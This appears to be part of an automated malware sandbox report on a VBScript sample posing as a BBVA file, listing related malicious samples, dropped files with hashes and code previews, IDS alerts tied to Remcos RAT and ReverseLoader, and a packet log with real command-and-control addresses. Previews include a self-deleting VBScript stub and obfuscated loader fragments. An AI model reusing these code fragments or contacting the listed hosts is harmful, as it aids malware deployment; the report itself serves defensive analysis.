                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.84.67
                                                        174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                        • 104.21.84.67
                                                        mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                        • 104.21.84.67
                                                        122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 104.21.84.67
                                                        pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 104.21.84.67
                                                        IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 104.21.84.67
                                                        873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 104.21.84.67
                                                        0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                        • 104.21.84.67
                                                        uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                        • 104.21.84.67
                                                        37f463bf4616ecd445d4a1937da06e19ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 45.63.94.214
                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 45.63.94.214
                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 45.63.94.214
                                                        hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                        • 45.63.94.214
                                                        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                        • 45.63.94.214
                                                        sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                        • 45.63.94.214
                                                        ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                        • 45.63.94.214
                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 45.63.94.214
                                                        bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                        • 45.63.94.214
                                                        ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                        • 45.63.94.214

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\haematachometer.vbs

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (475), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):171308
                                                        Entropy (8bit):3.447397726048375
                                                        Encrypted:false
                                                        SSDEEP:1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD
                                                        MD5:3C217B6A70E1FF5E6ECB71CA0E89644A
                                                        SHA1:D158BCEE429368797C22F4C2F9A305C2FF37BEAE
                                                        SHA-256:4E66FDBC38893F545B9088331861312E46E612BC9F4F96A9C88B286588680BF9
                                                        SHA-512:38BB4918E229BB83C0F7F4F3CA086253F22197F44887F81DBE4AAD019811B91799BC9206155C99906855372CDC0EB09F778913D8D2B59423C3B5E550585672DB
                                                        Malicious:true
                                                        Preview:..D.i.m. .s.h. .'.W.S.c.r.i.p.t...S.h.e.l.l. .o.b.j.e.c.t.....D.i.m. .f.s.o. .'.S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.....D.i.m. .f.o.r.m.a.t. .'.S.t.r.i.n.g.F.o.r.m.a.t.t.e.r. .o.b.j.e.c.t.....D.i.m. .s.u.i.t.e.F.o.l.d.e.r. .'.s.t.r.i.n.g.:. .f.o.l.d.e.r. .w.h.e.r.e. .t.e.s.t. .s.u.i.t.e. .s.c.r.i.p.t.s. .a.r.e. .l.o.c.a.t.e.d.....D.i.m. .p.r.o.j.e.c.t.F.o.l.d.e.r. .'.s.t.r.i.n.g.:. .r.o.o.t. .f.o.l.d.e.r. .f.o.r. .t.h.i.s. .p.r.o.j.e.c.t.....D.i.m. .s.u.i.t.e.F.i.l.t.e.r. .'.s.t.r.i.n.g.:. .f.i.l.e.n.a.m.e. .f.i.l.t.e.r. .f.o.r. .s.e.l.e.c.t.i.n.g. .i.n.t.e.g.r.a.t.i.o.n. .t.e.s.t. .s.u.i.t.e.s.......D.i.m. .c.a.p.t.i.o.n. .'.s.t.r.i.n.g.:. .M.s.g.B.o.x./.P.o.p.U.p. .t.i.t.l.e. .b.a.r. .t.e.x.t.......D.i.m. .a.D.o.c.G.e.n.s. .'.a.r.r.a.y. .o.f. .s.t.r.i.n.g.s.:. .f.i.l.e.s.p.e.c.s. .f.o.r. .c.o.d.e.-.c.o.m.m.e.n.t.-.b.a.s.e.d. .d.o.c.u.m.e.n.t.a.t.i.o.n. .g.e.n.e.r.a.t.o.r.s.......D.i.m. .a.G.i.t.s. .'.a.r.r.a.y. .o.f. .s.t.r.i.n.g.s.:. .c.o.m.m.o.n. .f.i.l.e.s.p.e.c.s.

                                                        C:\ProgramData\remcos\logs.dat

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):144
                                                        Entropy (8bit):3.38816599775145
                                                        Encrypted:false
                                                        SSDEEP:3:rhlKlyKJltWlPclfU5JWRal2Jl+7R0DAlBG45klovDl6v:6lZJlklPUfU5YcIeeDAlOWAv
                                                        MD5:01CDC853E2D3F97B6886ACBE2DDF9EB2
                                                        SHA1:EDE374396CC3D369BD9BC2FBA2F869D3F843668A
                                                        SHA-256:7D4CD0B5A0B6D86C25EA63AF6DAF4ABCAB58A43AC01786B27BF5728740931179
                                                        SHA-512:D5C6A30F3914CD2675021D438B55ED77D2C0AF09503DBBAEAA7018B9ADBB38136766459634E6E8D47BCB8E8338636EA9A7048836CAF48072C528670A2A8BDDA2
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                        Preview:....[.2.0.2.4./.1.2./.1.7. .0.8.:.3.0.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\LDDIb[1].txt

                                                        Download File
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (3445), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):79269
                                                        Entropy (8bit):5.541228121600052
                                                        Encrypted:false
                                                        SSDEEP:1536:Od+rLwb323bD0Xq5SXz8eRgd+rLwb323bD0Xq5SXz8ekd+rLwb323bD0Xq5SXz89:OdoLU323bDi2SXz8eRgdoLU323bDi2S1
                                                        MD5:EA91E5A559CF86C5CC019ABC9F4BD827
                                                        SHA1:C4D9D354CDE9689DA348B6DB214B35A1C1A807BF
                                                        SHA-256:A1DC46E1455ACF53BE3A11104D1930152A3B223AAC8A520DA0A6A4E370842308
                                                        SHA-512:0603463B0FCDAEEDE0F600D098D2BA7A99ED1D446F6B9476558575CCA5DA18A9808F4FE1420831B831D5BC4ADC6152D5AD5B697E7C33CECBBEC00D27BF2C4A10
                                                        Malicious:false
                                                        Preview:.. ..UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"..UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"..WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"....oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"..eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"..ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"..UWfhtLKWUUgoPqz = "bTpkdCGiiKNmBaU"..zhGoUWpQaiKGjPk = "NWiNHLdpKqaZoAu"..ceWzaLmkGipLKBi = "qLaWiSQZLBeKfiK"..aunkLTutZinmRUn = "LKJbSUkGoBRccuk"..cUNLHvHLbroohHB = "iWZoiqWOxmiKLhW"..tTinsTGLtURtcBf = "KapGpWGRUzofccW"..ALUOLbaKWpcKuhk = "ccLqLKiWppTflct"..AuGmoRicLqUqiWG = "fcucCbLojmKpUWW"..LiCGiLKWxinAUzd = "cLhGHLTdanWfkzd"....zKZNoUcUmUZQPWr = "WWOKLaTGNLmgRcb"..ditpecAnWALOpBm = "kQKuWeLtLlpNKNc"..KLWJoKNiWAKNZNS = "IbKIbbqLkUhWTxZ"..WZdchzWcLWZZlNO = "kpGxcOPohLLkAfz"..ohKhLicPRazZiGz = "NUZbtKkacGoooft"..LUWcceLNOAZUaAp = "oGWcKpuCUcKPxWU"..KSNmKWpPiqkgmWG = "NTPlqLGeRzcPdzv"..LjmKWcqLxkGkqWG = "LoKZctGzAlgWLca"..nsrUmqcbxNWLaLu = "ZtncWzhzKoiLABU"....UUeiokiRZUGarxd = "oHKcABNRiUGKaPR"..eLAKGpNqGgkxKAe = "kZLftUuCccKOIsk"..SLzLsCGfriudPbn = "AACZo

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):963
                                                        Entropy (8bit):5.018384957371898
                                                        Encrypted:false
                                                        SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                        MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                        SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                        SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                        SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\LDDIb[1].txt

                                                        Download File
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (3445), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):79269
                                                        Entropy (8bit):5.541228121600052
                                                        Encrypted:false
                                                        SSDEEP:1536:Od+rLwb323bD0Xq5SXz8eRgd+rLwb323bD0Xq5SXz8ekd+rLwb323bD0Xq5SXz89:OdoLU323bDi2SXz8eRgdoLU323bDi2S1
                                                        MD5:EA91E5A559CF86C5CC019ABC9F4BD827
                                                        SHA1:C4D9D354CDE9689DA348B6DB214B35A1C1A807BF
                                                        SHA-256:A1DC46E1455ACF53BE3A11104D1930152A3B223AAC8A520DA0A6A4E370842308
                                                        SHA-512:0603463B0FCDAEEDE0F600D098D2BA7A99ED1D446F6B9476558575CCA5DA18A9808F4FE1420831B831D5BC4ADC6152D5AD5B697E7C33CECBBEC00D27BF2C4A10
                                                        Malicious:false
                                                        Preview:.. ..UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"..UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"..WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"....oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"..eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"..ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"..UWfhtLKWUUgoPqz = "bTpkdCGiiKNmBaU"..zhGoUWpQaiKGjPk = "NWiNHLdpKqaZoAu"..ceWzaLmkGipLKBi = "qLaWiSQZLBeKfiK"..aunkLTutZinmRUn = "LKJbSUkGoBRccuk"..cUNLHvHLbroohHB = "iWZoiqWOxmiKLhW"..tTinsTGLtURtcBf = "KapGpWGRUzofccW"..ALUOLbaKWpcKuhk = "ccLqLKiWppTflct"..AuGmoRicLqUqiWG = "fcucCbLojmKpUWW"..LiCGiLKWxinAUzd = "cLhGHLTdanWfkzd"....zKZNoUcUmUZQPWr = "WWOKLaTGNLmgRcb"..ditpecAnWALOpBm = "kQKuWeLtLlpNKNc"..KLWJoKNiWAKNZNS = "IbKIbbqLkUhWTxZ"..WZdchzWcLWZZlNO = "kpGxcOPohLLkAfz"..ohKhLicPRazZiGz = "NUZbtKkacGoooft"..LUWcceLNOAZUaAp = "oGWcKpuCUcKPxWU"..KSNmKWpPiqkgmWG = "NTPlqLGeRzcPdzv"..LjmKWcqLxkGkqWG = "LoKZctGzAlgWLca"..nsrUmqcbxNWLaLu = "ZtncWzhzKoiLABU"....UUeiokiRZUGarxd = "oHKcABNRiUGKaPR"..eLAKGpNqGgkxKAe = "kZLftUuCccKOIsk"..SLzLsCGfriudPbn = "AACZo

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):9434
                                                        Entropy (8bit):4.928515784730612
                                                        Encrypted:false
                                                        SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                        MD5:D3594118838EF8580975DDA877E44DEB
                                                        SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                        SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                        SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avojdpzd.jzv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhonk0up.qgt.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmtiihrm.lnt.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suomcqjp.14f.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):390
                                                        Entropy (8bit):3.5203762121413913
                                                        Encrypted:false
                                                        SSDEEP:12:xQ4lA2++ugypjBQMB3D9+gxoIajp/VD9Z/0aimi:7a2+SMT9+gjY/h9yait
                                                        MD5:65C79EC358ABB207D3EB03CA384FAF23
                                                        SHA1:B65865FC07A3E4DE0EEE833B6C7E3B82DB4454A8
                                                        SHA-256:891D444AE2F47B67CD260CEDEB13CF9F273F0DFD5479360B91AECF7695D3A3FE
                                                        SHA-512:06F0050BF19D962B8899FFC1B557B47C24D7714337225C4A64844D9F3413F5DAE40FC7F6BE5A31BDFC9C21037D8B7AC1F9A61927CD073C4D50E81228AB697E58
                                                        Malicious:true
                                                        Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.a.s.p.n.e.t._.c.o.m.p.i.l.e.r...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                                        Static File Info

                                                        General

                                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (475), with CRLF line terminators
                                                        Entropy (8bit):3.447397726048375
                                                        TrID:
                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                        • MP3 audio (1001/1) 32.22%
                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                        • Corel Photo Paint (41/41) 1.32%
                                                        File name:BBVA S.A..vbs
                                                        File size:171'308 bytes
                                                        MD5:3c217b6a70e1ff5e6ecb71ca0e89644a
                                                        SHA1:d158bcee429368797c22f4c2f9a305c2ff37beae
                                                        SHA256:4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
                                                        SHA512:38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db
                                                        SSDEEP:1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD
                                                        TLSH:F0F37952A3FA0108F2F72F48A9B655744A27BDA6AD7DC65D019C684D1FF3A40C870BB3
                                                        File Content Preview:..D.i.m. .s.h. .'.W.S.c.r.i.p.t...S.h.e.l.l. .o.b.j.e.c.t.....D.i.m. .f.s.o. .'.S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.....D.i.m. .f.o.r.m.a.t. .'.S.t.r.i.n.g.F.o.r.m.a.t.t.e.r. .o.b.j.e.c.t.....D.i.m. .s.u.i.t.e.F.o.l.d.e.r. .'.s.t.r.i.n.g.:

                                                        File Icon

                                                        Icon Hash:68d69b8f86ab9a86

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-17T14:30:37.607592+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649784104.21.84.67443TCP
                                                        2024-12-17T14:30:38.013728+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.649784TCP
                                                        2024-12-17T14:30:38.013728+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.649784TCP
                                                        2024-12-17T14:30:39.010116+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.649784TCP
                                                        2024-12-17T14:30:40.870317+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64979545.80.158.3023101TCP
                                                        2024-12-17T14:30:43.373018+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649803178.237.33.5080TCP
                                                        2024-12-17T14:30:54.120307+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64982945.80.158.3023101TCP
                                                        2024-12-17T14:30:54.261015+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64983045.80.158.3023101TCP
                                                        2024-12-17T14:31:15.065246+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649880104.21.84.67443TCP
                                                        2024-12-17T14:31:15.461826+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.649880TCP
                                                        2024-12-17T14:31:15.461826+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.649880TCP
                                                        2024-12-17T14:31:16.431606+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.649880TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 17, 2024 14:30:04.019671917 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:04.019756079 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:04.019886017 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:04.060190916 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:04.060230017 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:05.830607891 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:05.830765963 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:05.889131069 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:05.889215946 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:05.889911890 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:05.889996052 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:05.892326117 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:05.939321041 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.398354053 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.398390055 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.398433924 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.398507118 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.398525000 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.398562908 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.398591042 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.513685942 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.513761997 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.513813972 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.513876915 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.513912916 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.513933897 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.559161901 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.559210062 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.559248924 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.559263945 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.559324980 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.682549000 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.682648897 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.682657957 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.682714939 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.682745934 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.682796001 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707267046 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.707375050 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.707382917 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707406998 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.707454920 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707454920 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707479954 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:06.707612038 CET4434971345.63.94.214192.168.2.6
